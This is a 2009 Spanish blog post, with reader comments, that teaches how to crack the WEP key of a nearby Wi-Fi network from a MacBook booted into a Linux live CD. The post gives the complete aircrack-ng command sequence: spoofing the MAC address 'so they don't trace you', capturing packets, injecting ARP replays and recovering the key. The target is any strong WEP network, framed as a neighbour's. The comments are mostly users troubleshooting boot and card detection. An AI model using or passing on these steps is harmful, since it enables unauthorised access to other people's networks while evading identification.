« El detergente Open Source
LOS DJ´S NO NECESITAN UNA LICENCIA DE SGAE PARA PODER PINCHAR »
h1

Inyectar paquetes con un Macbook con Airport

3 abril 2009

Como ya sabéis las airport de los Macbook se resisten a funcionar en modo pasivo para inyectar paquetes, y no podemos usar el archiconocido Kissmac.

Pero si arrancamos con una distribución de Linux, la cosa cambia.

Para el ejemplo podemos usar la mejor distribución que conozco 😛 La Albertux 1.0.1. Os la podéis bajar desde aquí. http://albertoreynolds.es/index.php?secc=downloads

Tambien podeis usar otras como la backtrack http://www.remote-exploit.org/backtrack_download.html

La quemamos y arrancamos el Macbook desde el cd (manteniendo presionado C nada más arrancarlo)

Una vez cargada, abrimos un Terminal y hacemos lo siguiente:

Primero cambiamos la mac de tu wifi (no vaya a ser que te rastreen)

#airmon-ng stop ath0

#ifconfig wifi0 down

#macchanger –mac 00:11:00:11:00:11 wifi0

La ponemos en pie y buscamos redes disponibles

#airmon-ng start wifi0

#airodump-ng ath0

Paramos el proceso pulsando Ctrl-C

Buscamos una red con encriptación wep y con mayor potencia (pwr)

airodump

En este caso nos quedamos con el BSSID 00:17:33:8C:81:77 y el canal CH  11

#airodump-ng -c 11 -w file –bssid 00:17:33:8C:81:77 ath0

Donde -c 11 indica el canal y -w file es el archivo donde se van guardando los paquetes capturados.

Dejamos este Terminal abierto y abrimos otro y ejecutamos:

#aireplay-ng -1 0 -a 00:17:33:8C:81:77  -h  00:11:00:11:00:11 ath0

#aireplay-ng -3 -b 00:17:33:8C:81:77  -h   00:11:00:11:00:11 ath0

Abrimos otro Terminal más sin cerrar los anteriores y cuando hayamos capturado suficientes paquetes ejecutamos:

#aircrack-ng -b 00:17:33:8C:81:77  file-01.cap

Si hay suficientes, saldrá la wep en este formato : [AA:BB:CC:DD:EE… y esa es la wep. Cuando te la pida, tendrás que escribirla sin los puntos, es decir AABBCCDDEE..

3_aircrack

Y así podreis ir a vuestro vecino y decirle que la seguridad de su router no es suficiente y que la incremente… ;-P

Publicado en General |

11 comentarios

  1. Hola, he cargado la distribucion en vmware fusion y no puedo hacer nada… de hecho no puedo ni ver redes wifi

         por DaveX 10 abril 2009 at 5:34 pm
    Responder

  2. no me detecta la airport…

         por DaveX 10 abril 2009 at 5:47 pm
    Responder

  3. Usad la backtrack. Y no la arranqueis con el vmware sino reiniciando desde el cd.

    Apagais el mac y lo encendeis manteniendo pulsada la C para que arranque desde el cd

         por carl0x 13 abril 2009 at 7:36 am
    Responder

  4. con un emuldor dudo que funcione…. pq usa de puente la airport que tienes activa en tu mac. No he probado aún, pero creia que no funcionava tampoco con linux! a ver que tal va!
    saludos

         por random 20 abril 2009 at 11:14 pm
    Responder

  5. Hola de antemano muchas gracias por tu tutorial,mira tengo el problema que baje el Albertux y cuando reinicio ya pongo linux y empieza a cargar pero se queda «pensando» en donde dice:

    drivers/usb/imput/hid-core, c: v2.6: USB HID core driver

    y despues lanza

    /bin/sh: can’t access tty: job control turned off
    (initramfs)

    agradeceria que me indicaras que debo hacer o que estoy haciendo mal tengo un macbook de los nuevos gracias

         por David Yos 21 abril 2009 at 5:43 pm
    Responder

    • me quede igual que david, no empieza el linux… de que otra manera le puedo hacer?

           por diego 21 septiembre 2009 at 10:16 pm
      Responder

  6. Saludos, tengo una mac intel core 2, acabo de bajarlo voy a probar y regreso a comentarles que onda.

    Tengo windows nativo en mi maquina y el aircrack, pero no tengo algun programa que realice las capturas, la bronca es con el driver para la airport.

    El aircrak version windows es mucho mas facil no usa comandos esta completamente mecanizado solo cargas el archivo… y le das encontrar clave y listo..

    Bueno haber q en unos dias les digo si funka…

         por Marc 11 May 2009 at 6:10 pm
    Responder

  7. Saludos, haber si alguien me puede ayudar acabo de bajar la distro de albertux la queme en un cd, pero al momento de arrancar con el empieza a cargar los archivos pero me marca un error:

    hda lost interruption

    Lei por ahi en algun post que el problema es q se le tienen q asiganar un numero de prioridad o algo asi a los discos q tendrian q ser 1 y 14 algo asi, bueno ahi aparece la solucion por linea de comandos desde a terminal, el problema es q albertux no inicia en modo terminal…

    Si alguein me puede orientar se los agradezco soy algo nuevo usando linux.

    Por cierto tengo un MacBook core 2 y tambien tengo windows nativo…

         por Marc 13 May 2009 at 2:43 pm
    Responder

  8. Se podrá Inyectar paquetes con un Powerbook con Airport…?

         por Mauro 11 junio 2009 at 10:56 pm
    Responder

  9. tengo una macbook negra 2.2ghz
    baje el backtrack3 y jala super bien, la cosa es que cuando quiero saver cual es el nombre de mi tarjeta
    «comando» airmon-ng

    no me lanza nada y cuando le cambio al config down
    me dice que no hay tal dispositivo

    obviamente tengo una tarjeta que esta cosa no identifica alguien save como ayudarme?

         por Juancarlos 26 febrero 2010 at 5:19 am
    Responder

  10. Oye, unas de las páginas más guapas que he visto, t lo juro.
    Lo que no entiendo es cómo es que has estudiado economía y no informática directamente.
    Muy interesante.
    Me he bajao varias distros de linux y las he usado con vmware: aparte de ubuntu y quizás otra más el resto no me pilla la red cableada, que por ejemplo para actualizar me es necesario aún con vmw.
    Así que ya tengo confirmación a quemar distros y probar desde ahí.
    Echaré un vistazo por akí si no t importa, a ver que veo, que pa mí que voy a encontrar algo intresante.

         por murtiuso 19 julio 2010 at 2:34 am
    Responder

Replica a Mauro Cancelar la respuesta